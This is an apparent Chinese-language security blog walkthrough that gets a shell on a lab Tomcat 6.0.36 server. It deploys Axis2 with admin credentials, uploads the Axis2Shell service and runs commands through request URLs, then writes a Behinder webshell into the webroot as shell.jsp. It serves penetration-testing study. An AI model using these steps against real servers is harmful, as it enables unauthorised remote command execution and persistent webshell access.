Tomcat的历史漏洞还是有这么多的,其中最常用的就是部署war包getshell了,但难免会遇到部署失败的情况,粗鲁地猜测可能有两个原因:
1.直接木马转war包部署被拦截,而普通文本转war包部署可正常访问,可能是安全防护设备在作妖,那就只能试试常规绕过;
2.目标网站是低版本Tomcat,攻防演练期间遇到很多低版本Tomcat网站,常规部署木马war包有时候会失效,最后通过部署axis2,然后在axis2中上传木马war包,则成功getshell。
本文呢,主要就是针对axis2进行getshell,详细操作如下。
本次实验的环境
Tomcat 6.0.36
Jdk1.8.0_202
部署Tomcat 6.0.36
没有找到现成的环境,自己搭建了一套。
官网下载Tomcat 6.0.36
https://archive.apache.org/dist/tomcat/tomcat-6/v6.0.36/bin/
修改tomcat的用户设置
环境启动
chmod +x ./*.sh
0x03 利用axis2进行getshell
部署axis2
下载地址:http://archive.apache.org/dist/axis/axis2/java/core/1.6.2/
利用axis2部署木马
账号密码来自axis2.war里面的WEB-INF/conf.axis2.xml
登录进去之后选择Upload Service部署Axis2Shell
https://github.com/Svti/Axis2Shell
部署成功后就可以进行命令执行
访问http://192.168.57.130:8080/axis2/services/config/exec?cmd=whoami
可以看到命令执行成功
获取当前项目所在路径(后面上冰蝎马需要用到)
http://192.168.57.130:8080/axis2/services/config/getClassPath
如何写入冰蝎马
将config.aar里面的resource下的one.txt的内容改为冰蝎马的内容:
然后使用Axis2Shell将one.txt部署到指定文件夹下,path可以通过/services/config/getClassPath获取
我这里直接将其部署到tomcat的ROOT目录下
利用如下命令将config.aar中的one.txt写到指定的jsp文件里
http://192.168.57.130:8080/axis2/services/config/upload?path=/home/kali/Desktop/test/apache-tomcat-6.0.36/webapps/ROOT/shell.jsp
上传成功
成功冰蝎连接:
END
往期回顾
漏洞分析 |【原创】Apusic应用服务器未授权目录遍历漏洞分析(附利用方法)
漏洞分析 |【原创】Nacos历史+最新漏洞详细分析(附利用方法)
技术分享 | spring-security 三种情况下的认证绕过
实用工具 | ChatGPT Tools,无需登录网址即可直接使用
权限提升 | Linux本地提权sudo(CVE-2021-3156)漏洞复现
技术分享 | 如何利用HTTP头部注入漏洞赚取12500美元的赏金
技术分享 | Windows文件/文件夹隐藏技巧,无需借助三方软件
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,文章作者和本公众号不承担任何法律及连带责任,望周知!!! |
点赞是鼓励 在看是认同 分享是传递知识
看完点个“在看”分享给更多人
原文始发于微信公众号(杂七杂八聊安全):技术分享 | 低版本Tomcat如何另类getshell,绝对另类哦~
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论